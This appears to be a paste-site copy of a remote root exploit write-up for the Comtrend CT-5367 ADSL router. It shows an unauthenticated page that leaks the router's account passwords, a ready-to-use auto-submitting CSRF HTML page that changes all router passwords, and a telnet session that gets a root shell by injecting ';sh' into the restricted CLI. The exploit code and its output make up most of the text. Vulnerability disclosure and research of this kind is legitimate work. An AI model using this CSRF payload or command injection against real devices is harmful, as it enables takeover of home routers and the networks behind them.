hackerscommunity

COMTREND ADSL Router CT-5367 remote root exploit

Jul 11th, 2015
  1. /*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12  Remote Root
  2. =============================================================================
  3. Board ID    : 96338A-122
  4. Software    : A111-312BTC-C01_R12
  5. Bootloader  : 1.0.37-12.1-1
  6. Wireless Driver : 4.170.16.0.cpe2.1sd
  7. ADSL        : A2pB023k.d20k_rc2
  8.  
  9. =============================================================================
  10. Type        : HardWare
  11. Risk of use : High
  12. Type to use : Remote
  13. Discovered by   : Todor Donev
  14. Author Email    : todor.donev@gmail.com
  15.  
  16. =============================================================================
  17. Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,
  18. and all my other friends that support me a lot of times for everything !!
  19.  
  20. */
  21.  
  22. root@linux:~#  get.pl http://192.168.1.1/
  23.  
  24. /*HTTP/1.1 401 Unauthorized
  25. Cache-Control: no-cache
  26. Connection: close
  27. Date: Sat, 01 Jan 2000 00:04:31 GMT
  28. Server: micro_httpd                        ## Yeah !! Bite me :(
  29. WWW-Authenticate: Basic realm="DSL Router"
  30. Content-Type: text/html
  31.  
  32. <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
  33. <BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
  34. Authorization required.
  35. <HR>
  36. <ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>
  37. </BODY></HTML>
  38. */
  39.  
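  40. root@linux:~#  get.pl http://192.168.1.1/password.cgi   ## Information disclosure: answers 200 Ok where / demanded Basic auth (401 above), and the page script carries the account passwords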
  41.  
  42. /*HTTP/1.1 200 Ok
  43. Cache-Control: no-cache
  44. Connection: close
  45. Date: Mon, 03 Jan 2000 23:01:25 GMT
  46. Server: micro_httpd
  47. Content-Type: text/html
  48.  
  49. <html>
  50.    <head>
  51.       <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
  52.       <link rel="stylesheet" href='stylemain.css' type='text/css'>
  53.          <link rel="stylesheet" href='colors.css' type='text/css'>
  54.             <script language="javascript" src="util.js"></script>
  55.             <script language="javascript">
  56. <!-- hide -->\n                           ## Dammit! =))
  57. pwdAdmin = '<CENSORED>';                  ## Censored Password
  58. pwdSupport = '<CENSORED>';                ## Censored Password
  59. pwdUser = '<CENSORED>';\n                 ## Censored Password
  60. */
  61.  
  62.  
  63.  
  64. [CUT EXPLOIT HERE]                        ## CSRF to change all passwords
  65.  
  66. <html>
  67. <head></head>
  68. <title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>
  69. <body onLoad=javascript:document.form.submit()>
  70. <form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
  71. <input type="hidden" name="sptPassword" value="shpek">
  72. <input type="hidden" name="usrPassword" value="shpek">
  73. <input type="hidden" name="sysPassword" value="shpek">
  74. </form>
  75. </body>
  76. </html>
  77.  
  78. [CUT EXPLOIT HERE]
  79.  
  80.  
  81. root@linux:~# telnet 192.168.1.1
  82.  
  83. ADSL Router Model CT-5367 Sw.Ver. C01_R12
  84. Login: root
  85. Password:
  86. ## BINGOO !! Godlike =))
  87. > ?
  88.  
  89. ?
  90. help
  91. logout
  92. reboot
  93. adsl
  94. atm
  95. ddns
  96. dumpcfg
  97. ping
  98. siproxd
  99. sntp
  100. sysinfo
  101. tftp
  102. wlan
  103. version
  104. build
  105. ipfilter
  106.  
  107. > sysinfo
  108. Number of processes: 30
  109.  11:46pm  up 2 days, 23:46,
  110. load average: 1 min:0.12, 5 min:0.05, 15 min:0.09
  111.               total         used         free       shared      buffers
  112.   Mem:        14012        13028          984            0          588
  113.  Swap:            0            0            0
  114. Total:        14012        13028          984
  115.  
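  116. > sysinfo ;sh                               ## JAILBREAK !! FirmWare sucks  :)  -- the restricted CLI passes the whole line to a shell unfiltered (see "sh -c sysinfo ;sh" in the ps output below)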
  117. Number of processes: 30
  118.  11:47pm  up 2 days, 23:47,
  119. load average: 1 min:0.07, 5 min:0.05, 15 min:0.08
  120.               total         used         free       shared      buffers
  121.   Mem:        14012        13024          988            0          588
  122.  Swap:            0            0            0
  123. Total:        14012        13024          988
  124.  
  125.  
  126. BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)
  127. Enter 'help' for a list of built-in commands.
  128.  
  129. # cat /proc/version
  130. Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009
  131.  
  132. # ps
  133.   PID  Uid     VmSize Stat Command
  134.     1 root        280 S   init
  135.     2 root            SWN [ksoftirqd/0]
  136.     3 root            SW< [events/0]
  137.    4 root            SW< [khelper]
  138.    5 root            SW< [kblockd/0]
  139.   15 root            SW  [pdflush]
  140.   16 root            SW  [pdflush]
  141.   17 root            SW  [kswapd0]
  142.   18 root            SW< [aio/0]
  143.   23 root            SW  [mtdblockd]
  144.   32 root        328 S   -sh
  145.   65 root       1384 S   cfm
  146.   72 root            SW  [bcmsw]
  147.  192 root        216 S   pvc2684d
  148.  275 root        496 S   nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A
  149.  342 root        304 S   dhcpd
  150.  596 root       1384 S   CT_Polling
  151.  600 root        432 S   pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p
  152.   931 root        248 S   dhcpc -i nas_0_0_40
  153.   993 root        316 S   dproxy -D btc-adsl
  154.   997 root        352 S   upnp -L br0 -W ppp_0_0_35_1 -D
  155.  1013 root        512 S   siproxd --config /var/siproxd/siproxd.conf
  156.  1014 root        512 S   siproxd --config /var/siproxd/siproxd.conf
  157.  1015 root        512 S   siproxd --config /var/siproxd/siproxd.conf
  158. 10745 root        292 S   syslogd -C -l 7
  159. 10747 root        256 S   klogd
  160.  6616 root       1396 S   telnetd
  161.  6618 root       1428 S   telnetd
  162.  6673 root        284 S   sh -c sysinfo ;sh
  163.  6724 root        284 R   ps
  164.  
  165. # top
  166. Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached
  167. Load average: 0.00, 0.02, 0.07    (State: S=sleeping R=running, W=waiting)
  168.  
  169.   PID USER     STATUS   RSS  PPID %CPU %MEM COMMAND
  170.  6751 root     R        288  6675  0.7  2.0 exe
  171.     2 root     SWN        0     1  0.3  0.0 ksoftirqd/0
  172.  6616 root     S       1396    65  0.1  9.9 telnetd
  173.   931 root     S        248     1  0.1  1.7 dhcpc
  174.  6618 root     S       1428  6616  0.0 10.1 telnetd
  175.    65 root     S       1384    32  0.0  9.8 cfm
  176.   596 root     S       1384    65  0.0  9.8 CT_Polling
  177.  1013 root     S        512     1  0.0  3.6 siproxd
  178.  1014 root     S        512  1013  0.0  3.6 siproxd
  179.  1015 root     S        512  1014  0.0  3.6 siproxd
  180.   275 root     S        496     1  0.0  3.5 nas
  181.   600 root     S        432     1  0.0  3.0 pppd
  182.   997 root     S        352     1  0.0  2.5 upnp
  183.    32 root     S        328     1  0.0  2.3 sh
  184.   993 root     S        316     1  0.0  2.2 dproxy
  185.  6675 root     S        316  6673  0.0  2.2 exe
  186.   342 root     S        304     1  0.0  2.1 dhcpd
  187. 10745 root     S        292     1  0.0  2.0 exe
  188.  6673 root     S        284  6618  0.0  2.0 sh
  189.     1 root     S        280     0  0.0  1.9 init
  190. # echo *                                               ## ls o.O?!?                                        
  191. bin dev etc lib linuxrc mnt proc sbin usr var webs
  192. #